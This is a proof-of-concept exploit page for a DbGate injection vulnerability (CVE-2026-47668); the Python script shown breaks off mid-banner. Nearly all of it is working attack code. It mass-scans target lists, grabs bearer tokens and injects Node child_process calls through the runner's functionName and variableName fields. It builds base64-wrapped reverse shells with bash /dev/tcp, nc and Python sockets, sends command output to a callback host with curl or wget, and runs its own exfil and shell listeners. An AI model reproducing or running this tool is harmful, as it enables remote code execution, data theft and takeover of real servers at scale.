5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-47668.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# By: Nxploited
#
# DbGate JSON runner assessment tool (POST /runners/start injection checks)
# Patched in DbGate v7.1.9+. For authorized security testing only.

from __future__ import annotations

import argparse
import asyncio
import base64
import json
import os
import re
import socket
import sys
import threading
import time
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, quote, urljoin, urlparse, urlunparse

import aiohttp
from colorama import Fore, Style, init as color_init

color_init(autoreset=True)

OUT_DIR = "Nx"
OUT_VULN = ""
OUT_DISPATCH = ""
OUT_REVSH = ""
OUT_EXFIL = ""
OUT_FAIL = ""
OUT_LIST_REPORT = ""
OUT_SUMMARY = ""
SESSION_DIR = ""
SESSION_ID = ""

DEFAULT_TARGETS = "list.txt"
APP_NAME = "dbgate"
DEFAULT_PORT = 3000          # DbGate default HTTP port
DEFAULT_CONCURRENCY = 30
DEFAULT_TIMEOUT = 15.0
DEFAULT_CALLBACK_PORT = 8888
DEFAULT_REVSH_PORT = 4444


# ── logging ──────────────────────────────────────────────────────────────────

def log_ok(msg: str) -> None:
    print(f"{Fore.GREEN}[+] {msg}{Style.RESET_ALL}")


def log_info(msg: str) -> None:
    print(f"{Fore.CYAN}[*] {msg}{Style.RESET_ALL}")


def log_warn(msg: str) -> None:
    print(f"{Fore.YELLOW}[!] {msg}{Style.RESET_ALL}")


def log_fail(msg: str) -> None:
    print(f"{Fore.RED}[-] {msg}{Style.RESET_ALL}")


def log_pwn(msg: str) -> None:
    print(f"{Fore.MAGENTA}[★] {msg}{Style.RESET_ALL}")


_SAVE_WARNED: Set[str] = set()


def save_line(path: str, line: str) -> None:
    if not path:
        return
    try:
        parent = os.path.dirname(path)
        if parent:
            os.makedirs(parent, exist_ok=True)
        with open(path, "a", encoding="utf-8") as fh:
            fh.write(line.rstrip() + "\n")
            fh.flush()
    except OSError as exc:
        if path not in _SAVE_WARNED:
            _SAVE_WARNED.add(path)
            log_warn(f"Cannot write to {path}: {exc}")


def init_nx_output() -> str:
    """Create Nx/ output tree; call before any scan."""
    global OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL, OUT_LIST_REPORT, OUT_SUMMARY
    global SESSION_DIR, SESSION_ID

    os.makedirs(OUT_DIR, exist_ok=True)
    os.makedirs(os.path.join(OUT_DIR, "exfil"), exist_ok=True)
    SESSION_ID = time.strftime("%Y%m%d_%H%M%S")
    SESSION_DIR = os.path.join(OUT_DIR, "sessions", SESSION_ID)
    os.makedirs(SESSION_DIR, exist_ok=True)

    OUT_VULN = os.path.join(OUT_DIR, "vuln.txt")
    OUT_DISPATCH = os.path.join(OUT_DIR, "dispatch.txt")
    OUT_REVSH = os.path.join(OUT_DIR, "revsh.txt")
    OUT_EXFIL = os.path.join(OUT_DIR, "exfil.txt")
    OUT_FAIL = os.path.join(OUT_DIR, "failed.txt")
    OUT_LIST_REPORT = os.path.join(OUT_DIR, "list_report.txt")
    OUT_SUMMARY = os.path.join(SESSION_DIR, "summary.json")

    for p in (OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL):
        open(p, "a", encoding="utf-8").close()

    log_ok(f"Output folder: {os.path.abspath(OUT_DIR)}/")
    log_info(f"Session: {SESSION_ID}")
    return SESSION_DIR


def exfil_target_key(target_url: str) -> str:
    """Canonical key for per-target exfil matching (mass-safe)."""
    if not target_url or target_url == "unknown":
        return "unknown"
    return ensure_target_url(target_url).rstrip("/")


def nx_exfil_path(target_url: str) -> str:
    tag = re.sub(r"[^\w.\-]+", "_", urlparse(target_url).netloc or "target")
    return os.path.join(OUT_DIR, "exfil", f"{tag}.txt")


def save_exfil_for_target(target_url: str, peer: str, decoded: str) -> None:
    line = f"[{time.strftime('%Y-%m-%d %H:%M:%S')}] peer={peer}\n{decoded}\n{'─' * 40}"
    save_line(OUT_EXFIL, f"[{target_url}] {decoded[:500]}")
    save_line(nx_exfil_path(target_url), line)


def url_tag(url: str) -> str:
    return urlparse(url).netloc or url


# ── URL / targets ────────────────────────────────────────────────────────────

def normalize_base(url: str) -> str:
    url = url.strip()
    if not url:
        return ""
    if not re.match(r"^https?://", url, re.I):
        url = "http://" + url
    return url.rstrip("/")


def ensure_target_url(raw: str, default_port: int = DEFAULT_PORT) -> str:
    """
    Build a valid base URL: scheme://host:port/path
    Never appends port after path (fixes http://host/path:3000 bug).
    """
    raw = normalize_base(raw)
    if not raw:
        return ""
    p = urlparse(raw)
    scheme = (p.scheme or "http").lower()
    host = p.hostname
    if not host:
        return ""
    if p.port is not None:
        port = p.port
    else:
        # DbGate default when line has no explicit port (http or https)
        port = default_port
    path = p.path or ""
    if path == "/":
        path = ""
    netloc = f"{host}:{port}"
    return urlunparse((scheme, netloc, path, "", p.query, p.fragment))


def load_targets_raw(path: str) -> List[str]:
    out: List[str] = []
    try:
        with open(path, "r", encoding="utf-8") as fh:
            for line in fh:
                out.append(line.rstrip("\n\r"))
    except OSError as exc:
        log_fail(f"Cannot read targets: {exc}")
    return out


@dataclass
class ListLoadStats:
    raw: int = 0
    blank: int = 0
    comment: int = 0
    invalid: int = 0
    dup: int = 0
    resolved: int = 0


def parse_target_line(
    line: str,
    default_port: int = DEFAULT_PORT,
) -> Tuple[Optional[str], str, str]:
    """
    Returns (url, per_target_command, reason).
    Supports: host, host:port, URL, host/path, and optional |command per line.
    """
    original = line
    per_cmd = ""
    work = line.strip()
    if not work:
        return None, "", "blank"
    if work.startswith("#"):
        return None, "", "comment"

    if "|" in work:
        host_part, _, cmd_part = work.partition("|")
        work = host_part.strip()
        per_cmd = cmd_part.strip()

    line = work
    if not re.match(r"^https?://", line, re.I):
        if re.match(r"^[\d.a-zA-Z_-]+:\d+", line) and "/" not in line.split(":")[0]:
            line = f"http://{line}"
        elif re.match(r"^[\d.a-zA-Z_.-]+(:\d+)?/", line):
            if not line.startswith("http"):
                line = f"http://{line}"
        elif re.match(r"^[\w.\-]+$", line) or re.match(r"^\d{1,3}(\.\d{1,3}){3}$", line):
            line = f"http://{line}"
        else:
            line = f"http://{line}"

    url = ensure_target_url(line, default_port)
    if not url or not urlparse(url).hostname:
        return None, per_cmd, f"invalid:{original[:80]}"
    return url, per_cmd, ""


def load_targets_smart(
    path: str,
    default_port: int = DEFAULT_PORT,
) -> Tuple[List[str], Dict[str, str], ListLoadStats, List[str]]:
    """Load list file with stats; never mixes ports incorrectly."""
    lines = load_targets_raw(path)
    stats = ListLoadStats(raw=len(lines))
    seen: Set[str] = set()
    urls: List[str] = []
    per_cmds: Dict[str, str] = {}
    errors: List[str] = []

    for line in lines:
        if not line.strip():
            stats.blank += 1
            continue
        if line.strip().startswith("#"):
            stats.comment += 1
            continue
        url, per_cmd, reason = parse_target_line(line, default_port)
        if reason == "blank":
            stats.blank += 1
            continue
        if reason == "comment":
            stats.comment += 1
            continue
        if not url:
            stats.invalid += 1
            errors.append(f"{line.strip()} -> {reason}")
            continue
        if url in seen:
            stats.dup += 1
            continue
        seen.add(url)
        urls.append(url)
        if per_cmd:
            per_cmds[url] = per_cmd
        stats.resolved += 1

    return urls, per_cmds, stats, errors


def write_list_report(
    path: str,
    stats: ListLoadStats,
    urls: List[str],
    errors: List[str],
    default_port: int = DEFAULT_PORT,
    per_cmds: Optional[Dict[str, str]] = None,
) -> None:
    lines = [
        f"file={path}",
        f"raw={stats.raw} blank={stats.blank} comment={stats.comment}",
        f"invalid={stats.invalid} dup={stats.dup} resolved={stats.resolved}",
        f"default_port={default_port} (applied when line has no explicit port)",
        "",
        "=== resolved targets ===",
    ]
    for u in urls:
        cmd = (per_cmds or {}).get(u, "")
        lines.append(f"{u}|{cmd}" if cmd else u)
    if errors:
        lines.extend(["", "=== invalid lines ==="])
        lines.extend(errors)
    try:
        with open(OUT_LIST_REPORT, "w", encoding="utf-8") as fh:
            fh.write("\n".join(lines) + "\n")
    except OSError as exc:
        log_warn(f"Cannot write list report: {exc}")


def parse_login_json(raw: Optional[str]) -> Tuple[Optional[Dict[str, Any]], Optional[str]]:
    if not raw or not raw.strip():
        return {"amoid": "none"}, None
    try:
        data = json.loads(raw)
        if not isinstance(data, dict):
            return None, "login JSON must be an object"
        return data, None
    except json.JSONDecodeError as exc:
        return None, f"invalid login JSON: {exc}"


def guess_lan_ip() -> str:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
        s.close()
        return ip
    except OSError:
        return "127.0.0.1"


def extract_bearer_token(data: Any, raw_text: str = "") -> Optional[str]:
    """Pull Bearer token from DbGate /auth/login JSON (several response shapes)."""
    if isinstance(data, dict):
        for key in ("accessToken", "token", "access_token", "jwt", "bearer"):
            val = data.get(key)
            if val and isinstance(val, str):
                return val
        for nest in ("data", "result", "user", "session", "auth"):
            sub = data.get(nest)
            if isinstance(sub, dict):
                found = extract_bearer_token(sub)
                if found:
                    return found
    if raw_text:
        for pattern in (
            r'"accessToken"\s*:\s*"([^"]+)"',
            r'"token"\s*:\s*"([^"]+)"',
            r'"access_token"\s*:\s*"([^"]+)"',
        ):
            m = re.search(pattern, raw_text)
            if m:
                return m.group(1)
    return None


class ReuseHTTPServer(HTTPServer):
    allow_reuse_address = True


# ── injection builders ─────────────────────────────────────────────────────────

def _js_escape_single(s: str) -> str:
    return (
        s.replace("\\", "\\\\")
        .replace("'", "\\'")
        .replace("\n", "\\n")
        .replace("\r", "\\r")
    )


def parse_revsh_endpoint(
    spec: Optional[str],
    default_port: int = DEFAULT_REVSH_PORT,
) -> Tuple[str, int]:
    """
    Parse LHOST:LPORT for reverse shell (address the *target* must dial).
    spec None / AUTO → guessed LAN IP + default_port.
    """
    if spec is None or str(spec).strip().upper() == "AUTO" or not str(spec).strip():
        return guess_lan_ip(), default_port
    raw = str(spec).strip()
    if raw.startswith("[") and "]" in raw:
        host = raw[1 : raw.index("]")]
        rest = raw[raw.index("]") + 1 :]
        if rest.startswith(":"):
            return host, int(rest[1:])
        return host, default_port
    if ":" in raw:
        host, _, port_s = raw.rpartition(":")
        host = host.strip()
        if not host:
            raise ValueError(f"invalid reverse-shell endpoint: {spec!r}")
        return host, int(port_s)
    return raw, default_port


def build_reverse_shell_cmd(lhost: str, lport: int) -> str:
    """
    Detached reverse-shell attempts (async exec). Uses base64-wrapped script
    to avoid broken nested quoting inside sh -c.
    """
    h, p = lhost, int(lport)
    script = (
        f"bash -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || "
        f"sh -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || "
        f"rm -f /tmp/.nx;mkfifo /tmp/.nx;cat /tmp/.nx|sh -i 2>&1|nc {h} {p} >/tmp/.nx || "
        f"nc -e /bin/sh {h} {p} 2>/dev/null || "
        f"busybox nc {h} {p} -e sh 2>/dev/null || "
        f"python3 -c \"import socket,os,subprocess;"
        f"s=socket.socket();s.connect(('{h}',{p}));"
        f"os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        f"subprocess.call(['/bin/sh','-i'])\" 2>/dev/null"
    )
    payload_b64 = base64.b64encode(script.encode()).decode()
    return (
        f"(command -v base64 >/dev/null 2>&1 && "
        f"echo {payload_b64}|base64 -d|nohup sh >/dev/null 2>&1 &) || "
        f"(echo {payload_b64}|openssl base64 -d|nohup sh >/dev/null 2>&1 &)"
    )


def build_node_exec_js(shell_cmd: str, sync: bool = True) -> str:
    esc = _js_escape_single(shell_cmd)
    if sync:
        return (
            f"process.mainModule.require('child_process').execSync('{esc}',"
            f"{{encoding:'utf8',timeout:120000}})"
        )
    return f"process.mainModule.require('child_process').exec('{esc}')"


def build_shell_exfil(
    cmd: str,
    callback_url: str,
    b64: bool = True,
    target_tag: str = "",
) -> str:
    base = callback_url.rstrip("/")
    qs_parts: List[str] = []
    if target_tag:
        qs_parts.append(f"target={quote(target_tag, safe='')}")
    cb_full = f"{base}?{'&'.join(qs_parts)}" if qs_parts else base
    # Run command once, encode once, then try curl then wget (no double exec).
    if b64:
        return (
            f"__nx=$( ({cmd}) 2>&1 ); "
            f"b64=$(printf %s \"$__nx\" | base64 -w0 2>/dev/null "
            f"|| printf %s \"$__nx\" | base64 2>/dev/null || echo FAIL); "
            f"curl -sk -G '{cb_full}' --data-urlencode \"data=$b64\" "
            f"|| wget -qO- --post-data=\"data=$b64\" '{cb_full}'"
        )
    return (
        f"__nx=$( ({cmd}) 2>&1 ); "
        f"curl -sk -G '{cb_full}' --data-urlencode \"data=$__nx\" "
        f"|| wget -qO- --post-data=\"data=$__nx\" '{cb_full}'"
    )


def inject_function_name(node_js: str) -> str:
    return f"x;{node_js};//"


def inject_variable_name(node_js: str, fn_safe: str = "x") -> Tuple[str, str]:
    return f"x;{node_js};var __nx", f"{fn_safe};//"


def build_json_script(
    vector: str,
    node_js: str,
    props: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
    props = props or {}
    if vector == "functionName":
        return {
            "type": "json",
            "commands": [{
                "type": "assign",
                "variableName": "x",
                "functionName": inject_function_name(node_js),
                "props": props,
            }],
            "packageNames": [],
        }
    if vector == "variableName":
        var_name, fn_name = inject_variable_name(node_js)
        return {
            "type": "json",
            "commands": [{
                "type": "assign",
                "variableName": var_name,
                "functionName": fn_name,
                "props": props,
            }],
            "packageNames": [],
        }
    raise ValueError(f"Unknown vector: {vector}")


# ── exfil listener ───────────────────────────────────────────────────────────

class ExfilHandler(BaseHTTPRequestHandler):
    hits: List[str] = []
    hits_by_target: Dict[str, List[str]] = {}
    _lock = threading.Lock()

    @classmethod
    def hit_count(cls) -> int:
        with cls._lock:
            return len(cls.hits)

    @classmethod
    def hits_for_target(cls, target_url: str, baseline: int = 0) -> int:
        key = exfil_target_key(target_url)
        with cls._lock:
            entries = cls.hits_by_target.get(key, [])
            return max(0, len(entries) - baseline)

    def log_message(self, fmt: str, *args: Any) -> None:
        pass

    def _parse_request(self) -> Tuple[str, str, str]:
        peer = self.client_address[0]
        parsed = urlparse(self.path)
        qs = parse_qs(parsed.query)
        target_key = qs.get("target", [""])[0]
        if self.command == "POST":
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length).decode("utf-8", errors="replace")
            bqs = parse_qs(body)
            raw = bqs.get("data", [body])[0]
            if not target_key:
                target_key = bqs.get("target", [""])[0]
            return raw, target_key, peer
        raw = qs.get("data", [""])[0]
        return raw, target_key, peer

    def do_GET(self) -> None:
        self._handle()

    def do_POST(self) -> None:
        self._handle()

    def _handle(self) -> None:
        raw, target_key, peer = self._parse_request()
        decoded = raw
        try:
            decoded = base64.b64decode(raw).decode("utf-8", errors="replace")
        except Exception:
            pass
        target_url = target_key or "unknown"
        line = (
            f"[{time.strftime('%H:%M:%S')}] peer={peer} "
            f"target={target_url} | {decoded[:8000]}"
        )
        store_key = exfil_target_key(target_url) if target_url != "unknown" else "unknown"
        with ExfilHandler._lock:
            ExfilHandler.hits.append(line)
            ExfilHandler.hits_by_target.setdefault(store_key, []).append(decoded)
        log_pwn(f"EXFIL [{target_url}] from {peer}: {decoded[:200]!r}")
        if target_url and target_url != "unknown":
            save_exfil_for_target(target_url, peer, decoded)
        else:
            save_line(OUT_EXFIL, line)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")


def start_exfil_server(
    bind_host: str,
    port: int,
    max_tries: int = 25,
) -> Tuple[HTTPServer, int]:
    """
  Start HTTP exfil listener. If port is busy (e.g. 4444 = msf), try next ports.
    """
    bind = bind_host if bind_host else "0.0.0.0"
    last_err: Optional[OSError] = None
    for offset in range(max_tries):
        try_port = port + offset
        try:
            srv = ReuseHTTPServer((bind, try_port), ExfilHandler)
            threading.Thread(target=srv.serve_forever, daemon=True).start()
            if try_port != port:
                log_warn(f"Port {port} busy — listener using {try_port} instead")
            log_ok(f"Exfil listener bound on {bind}:{try_port}")
            return srv, try_port
        except OSError as exc:
            last_err = exc
            if getattr(exc, "errno", None) not in (48, 98, 10048):
                raise
            continue
    raise OSError(
        f"Could not bind {bind}:{port}-{port + max_tries - 1}: {last_err}"
    )


class TcpRevshListener:
    """TCP listener to verify reverse-shell connectivity from the target."""

    def __init__(self, bind_host: str = "0.0.0.0", port: int = DEFAULT_REVSH_PORT) -> None:
        self.bind_host = bind_host or "0.0.0.0"
        self.port = port
        self._sock: Optional[socket.socket] = None
        self._conn: Optional[socket.socket] = None
        self.peer: Tuple[str, int] = ("", 0)
        self.banner: bytes = b""

    def start(self, max_tries: int = 25) -> int:
        bind = self.bind_host
        last_err: Optional[OSError] = None
        for offset in range(max_tries):
            try_port = self.port + offset
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            try:
                sock.bind((bind, try_port))
                sock.listen(1)
                self._sock = sock
                if offset > 0:
                    log_warn(
                        f"Revsh port {self.port} busy — listening on {try_port} instead"
                    )
                self.port = try_port
                log_ok(f"Reverse-shell listener on {bind}:{try_port}")
                return try_port
            except OSError as exc:
                last_err = exc
                sock.close()
                if getattr(exc, "errno", None) not in (48, 98, 10048):
                    raise
                continue
        raise OSError(
            f"Could not bind revsh {bind}:{self.port}-{self.port + max_tries - 1}: {last_err}"
        )

    def wait(self, timeout: float) -> bool:
        if not self._sock:
            return False
        self._sock.settimeout(timeout)
        try:
            conn, addr = self._sock.accept()
            self._conn = conn
            self.peer = (addr[0], addr[1])
            conn.settimeout(2.0)
            try:
                self.banner = conn.recv(4096)
            except OSError:
                self.banner = b""
            return True
        except socket.timeout:
            return False
        except OSError:
            return False

    def relay_interactive(self) -> None:
        """Best-effort line bridge after connect (use external nc for full TTY)."""
        conn = self._conn
        if not conn:
            return

        def _reader() -> None:
            while True:
                try:
                    data = conn.recv(4096)
                    if not data:
                        break
                    sys.stdout.write(data.decode("utf-8", errors="replace"))
                    sys.stdout.flush()
                except OSError:
                    break

        threading.Thread(target=_reader, daemon=True).start()
        log_info("Interactive relay — type commands; Ctrl+C to exit")
        try:
            while True:
                line = input()
                conn.sendall((line + "\n").encode())
        except (EOFError, KeyboardInterrupt, OSError):
            pass

    def close(self) -> None:
        for s in (self._conn, self._sock):
            if s:
                try:
                    s.close()
                except OSError:
                    pass
        self._conn = None
        self._sock = None


async def wait_revsh_async(listener: TcpRevshListener, timeout: float) -> bool:
    loop = asyncio.get_running_loop()
    return await loop.run_in_executor(None, listener.wait, timeout)


def build_callback_url(
    callback_host: str,
    listen_port: int,
    scheme: str = "http",
) -> str:
    host = callback_host.strip()
    if not host:
        host = guess_lan_ip()
    if host in ("0.0.0.0", "::"):
        log_warn("Callback host cannot be 0.0.0.0 — use an IP reachable FROM the target")
        host = guess_lan_ip()
        log_info(f"Using guessed LAN IP for callback: {host}")
    return f"{scheme}://{host}:{listen_port}/"


# ── DbGate client ──────────────────────────────────────────────────────────────

class DbGateExploit:
    VECTORS = ("functionName", "variableName", "both")

    def __init__(
        self,
        base_url: str,
        timeout: float = DEFAULT_TIMEOUT,
        verify_ssl: bool = False,
        token: Optional[str] = None,
        login_body: Optional[Dict[str, Any]] = None,
    ):
        self.base_url = ensure_target_url(base_url)
        self.timeout = aiohttp.ClientTimeout(total=timeout)
        self.verify_ssl = verify_ssl
        self.token = token
        self.login_body = login_body or {"amoid": "none"}
        self.tag = urlparse(self.base_url).netloc or self.base_url
        self.last_vector_used = ""

    def _headers(self, with_auth: bool = True) -> Dict[str, str]:
        h = {"Content-Type": "application/json", "Accept": "application/json"}
        if with_auth and self.token:
            h["Authorization"] = f"Bearer {self.token}"
        return h

    async def _request(
        self,
        session: aiohttp.ClientSession,
        method: str,
        path: str,
        **kwargs: Any,
    ) -> Tuple[int, str, Any]:
        url = urljoin(self.base_url + "/", path.lstrip("/"))
        try:
            async with session.request(
                method, url, ssl=self.verify_ssl, timeout=self.timeout, **kwargs
            ) as resp:
                text = await resp.text()
                try:
                    data = json.loads(text) if text.strip() else {}
                except json.JSONDecodeError:
                    data = {"_raw": text}
                return resp.status, text, data
        except asyncio.TimeoutError:
            return 0, "timeout", {}
        except aiohttp.ClientError as exc:
            return 0, str(exc), {}

    async def probe_alive(self, session: aiohttp.ClientSession) -> bool:
        for path in ("/", "/api/status", "/status"):
            status, _, _ = await self._request(session, "GET", path)
            if status in (200, 401, 403, 404, 302):
                return True
        return False

    async def obtain_token(self, session: aiohttp.ClientSession) -> bool:
        if self.token:
            return True
        status, text, data = await self._request(
            session,
            "POST",
            "/auth/login",
            json=self.login_body,
            headers={"Content-Type": "application/json"},
        )
        if status != 200:
            log_fail(f"[{self.tag}] auth/login HTTP {status}: {text[:120]}")
            return False
        token = extract_bearer_token(data, text)
        if not token:
            log_fail(
                f"[{self.tag}] no token in login response "
                f"(HTTP {status}): {text[:160]}"
            )
            return False
        self.token = token
        preview = token if len(token) < 24 else f"{token[:20]}...{token[-6:]}"
        log_ok(f"[{self.tag}] Bearer token auto-obtained ({preview})")
        return True

    async def runners_start(
        self,
        session: aiohttp.ClientSession,
        script: Dict[str, Any],
    ) -> Tuple[bool, Optional[str], str]:
        status, text, data = await self._request(
            session,
            "POST",
            "/runners/start",
            json={"script": script},
            headers=self._headers(True),
        )
        if status != 200:
            return False, None, f"HTTP {status}: {text[:200]}"
        if isinstance(data, dict) and data.get("errorMessage"):
            return False, None, str(data["errorMessage"])
        runid = None
        if isinstance(data, dict):
            runid = data.get("runid") or data.get("runId")
        if runid or "runid" in text.lower():
            return True, str(runid or "?"), text
        return False, None, text[:300]

    async def run_injection(
        self,
        session: aiohttp.ClientSession,
        vector: str,
        node_js: str,
        props: Optional[Dict[str, Any]] = None,
    ) -> Tuple[bool, Optional[str], str]:
        if vector == "both":
            ok, rid, err = await self.run_injection(
                session, "functionName", node_js, props
            )
            if ok:
                self.last_vector_used = "functionName"
                return ok, rid, err
            ok, rid, err = await self.run_injection(
                session, "variableName", node_js, props
            )
            if ok:
                self.last_vector_used = "variableName"
            return ok, rid, err

        self.last_vector_used = vector
        script = build_json_script(vector, node_js, props)
        return await self.runners_start(session, script)

    async def check_vulnerable(
        self,
        session: aiohttp.ClientSession,
        vector: str = "functionName",
    ) -> Tuple[bool, str]:
        probe_js = "void 0"
        ok, runid, err = await self.run_injection(session, vector, probe_js)
        if ok:
            v = self.last_vector_used or vector
            return True, f"runner-accepted vector={v} runid={runid}"
        return False, err

    async def execute_command(
        self,
        session: aiohttp.ClientSession,
        command: str,
        callback_url: Optional[str] = None,
        vector: str = "functionName",
        async_exec: bool = False,
        b64_exfil: bool = True,
    ) -> Tuple[bool, str]:
        shell = (
            build_shell_exfil(
                command,
                callback_url,
                b64=b64_exfil,
                target_tag=self.base_url,
            )
            if callback_url
            else command
        )
        node_js = build_node_exec_js(shell, sync=not async_exec)
        ok, runid, err = await self.run_injection(session, vector, node_js)
        if ok:
            v = self.last_vector_used or vector
            return True, f"dispatched vector={v} runid={runid}"
        return False, err

    async def full_chain(
        self,
        command: str,
        callback_url: Optional[str] = None,
        vector: str = "functionName",
        check_only: bool = False,
        async_exec: bool = False,
        b64_exfil: bool = True,
        wait_exfil: float = 8.0,
        target_exfil_baseline: int = 0,
        use_reverse_shell: bool = False,
        wait_revsh: float = 15.0,
        revsh_listener: Optional[TcpRevshListener] = None,
        revsh_interactive: bool = False,
    ) -> str:
        """
        fail     — unreachable / auth fail / not vulnerable
        vuln     — runner accepts injection probe (or exec without callback)
        dispatch — payload accepted; no confirmed output / no revsh connect
        exfil    — callback received new data after dispatch (confirmed output)
        revsh    — TCP reverse connection received on local listener
        """
        connector = aiohttp.TCPConnector(ssl=self.verify_ssl, limit=1)
        async with aiohttp.ClientSession(connector=connector) as session:
            if not await self.probe_alive(session):
                log_fail(f"[{self.tag}] target not reachable")
                return "fail"

            if not await self.obtain_token(session):
                return "fail"

            vuln, detail = await self.check_vulnerable(session, vector)
            if not vuln:
                log_fail(f"[{self.tag}] not vulnerable / blocked: {detail}")
                return "fail"

            log_ok(f"[{self.tag}] VULNERABLE ({detail})")
            save_line(OUT_VULN, f"{self.base_url}|{detail}")

            if check_only:
                return "vuln"

            if not command:
                return "vuln"

            exec_async = async_exec or use_reverse_shell
            exec_cb = None if use_reverse_shell else callback_url

            ok, msg = await self.execute_command(
                session,
                command,
                callback_url=exec_cb,
                vector=vector,
                async_exec=exec_async,
                b64_exfil=b64_exfil,
            )
            if not ok:
                log_fail(f"[{self.tag}] exec failed: {msg}")
                return "vuln"

            log_pwn(f"[{self.tag}] {msg}")
            out_file = OUT_REVSH if use_reverse_shell else OUT_DISPATCH
            save_line(
                out_file,
                f"{self.base_url}|cmd={command!r}|callback={callback_url or ''}|{msg}",
            )

            if use_reverse_shell:
                if not revsh_listener:
                    log_warn(f"[{self.tag}] no revsh listener — cannot verify connection")
                    return "dispatch"
                log_info(
                    f"[{self.tag}] waiting up to {wait_revsh:.0f}s for reverse TCP..."
                )
                if await wait_revsh_async(revsh_listener, wait_revsh):
                    peer = f"{revsh_listener.peer[0]}:{revsh_listener.peer[1]}"
                    log_ok(f"[{self.tag}] reverse TCP connected from {peer}")
                    if revsh_listener.banner:
                        preview = revsh_listener.banner[:200]
                        log_info(f"  banner: {preview!r}")
                    save_line(
                        OUT_REVSH,
                        f"{self.base_url}|peer={peer}|{msg}",
                    )
                    if revsh_interactive:
                        revsh_listener.relay_interactive()
                    return "revsh"
                log_warn(
                    f"[{self.tag}] payload dispatched but no reverse TCP "
                    f"(firewall/Docker/no bash|nc; target must reach listener)"
                )
                return "dispatch"

            if not callback_url:
                log_warn(f"[{self.tag}] no callback — blind dispatch only (not confirmed output)")
                return "vuln"

            got = await wait_for_exfil(
                wait_exfil,
                self.base_url,
                target_exfil_baseline,
            )
            if got:
                log_ok(f"[{self.tag}] output received via callback")
                log_info(f"  → {nx_exfil_path(self.base_url)}")
                return "exfil"

            log_warn(
                f"[{self.tag}] payload dispatched but no callback data "
                f"(check firewall/NAT/curl on target; callback={callback_url})"
            )
            return "dispatch"


# ── scan ───────────────────────────────────────────────────────────────────────

def exfil_received_for_target(target_url: str, target_baseline: int) -> bool:
    """True only if this target URL received new exfil (mass-safe, no global bleed)."""
    return ExfilHandler.hits_for_target(target_url, target_baseline) > 0


async def wait_for_exfil(
    wait_sec: float,
    target_url: str,
    target_baseline: int,
    poll_sec: float = 0.5,
) -> bool:
    """Poll until callback data arrives for this target only."""
    if wait_sec <= 0:
        return exfil_received_for_target(target_url, target_baseline)
    deadline = time.monotonic() + wait_sec
    while True:
        if exfil_received_for_target(target_url, target_baseline):
            return True
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            return False
        await asyncio.sleep(min(poll_sec, remaining))


def describe_result(result: str) -> str:
    return {
        "fail": "unreachable / auth failed / not vulnerable",
        "vuln": "runner accepted probe (no command output)",
        "dispatch": "payload accepted — no callback/revsh confirmation",
        "exfil": "callback received — command output confirmed",
        "revsh": "reverse TCP connection received (use --revsh-interactive for basic relay)",
    }.get(result, result)


async def scan_one(
    target: str,
    command: str,
    callback_url: Optional[str],
    vector: str,
    check_only: bool,
    timeout: float,
    verify_ssl: bool,
    token: Optional[str],
    login_body: Optional[Dict[str, Any]],
    async_exec: bool,
    b64_exfil: bool,
    wait_exfil: float,
) -> str:
    client = DbGateExploit(
        target,
        timeout=timeout,
        verify_ssl=verify_ssl,
        token=token,
        login_body=login_body,
    )
    t_key = exfil_target_key(target)
    with ExfilHandler._lock:
        t_base = len(ExfilHandler.hits_by_target.get(t_key, []))
    try:
        return await client.full_chain(
            command=command,
            callback_url=callback_url,
            vector=vector,
            check_only=check_only,
            async_exec=async_exec,
            b64_exfil=b64_exfil,
            wait_exfil=wait_exfil,
            target_exfil_baseline=t_base,
        )
    except Exception as exc:
        log_fail(f"[{client.tag}] {exc}")
        return "fail"


async def mass_scan(
    targets: List[str],
    command: str,
    callback_url: Optional[str],
    vector: str,
    check_only: bool,
    concurrency: int,
    timeout: float,
    verify_ssl: bool,
    token: Optional[str],
    login_body: Optional[Dict[str, Any]],
    async_exec: bool,
    b64_exfil: bool,
    wait_exfil: float,
    target_commands: Optional[Dict[str, str]] = None,
) -> Dict[str, int]:
    sem = asyncio.Semaphore(concurrency)
    stats: Dict[str, int] = {
        "exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0,
    }
    total = len(targets)
    done = 0
    lock = asyncio.Lock()

    async def worker(t: str) -> None:
        nonlocal done
        cmd = (target_commands or {}).get(t) or command
        async with sem:
            result = await scan_one(
                t, cmd, callback_url, vector, check_only,
                timeout, verify_ssl, token, login_body,
                async_exec, b64_exfil, wait_exfil,
            )
        async with lock:
            stats[result] = stats.get(result, 0) + 1
            done += 1
            pct = done / total * 100
            print(
                f"{Fore.CYAN}[{done:>5}/{total} {pct:5.1f}%] "
                f"{Fore.MAGENTA}EXFIL={stats['exfil']} "
                f"{Fore.GREEN}DISP={stats['dispatch']} "
                f"{Fore.YELLOW}VULN={stats['vuln']} "
                f"{Fore.RED}FAIL={stats['fail']}"
                f"{Style.RESET_ALL}",
                end="\r",
            )
            if result == "fail":
                save_line(OUT_FAIL, t)

    tasks = [asyncio.create_task(worker(t)) for t in targets]
    try:
        await asyncio.gather(*tasks)
    except KeyboardInterrupt:
        for t in tasks:
            t.cancel()
    print()
    return stats


# ── interactive wizard ───────────────────────────────────────────────────────

def show_banner() -> None:
    os.system("cls" if os.name == "nt" else "clear")
    w = 84
    print(Fore.MAGENTA + "═" * w + Style.RESET_ALL)
    print(
        Fore.WHITE + Style.BRIGHT
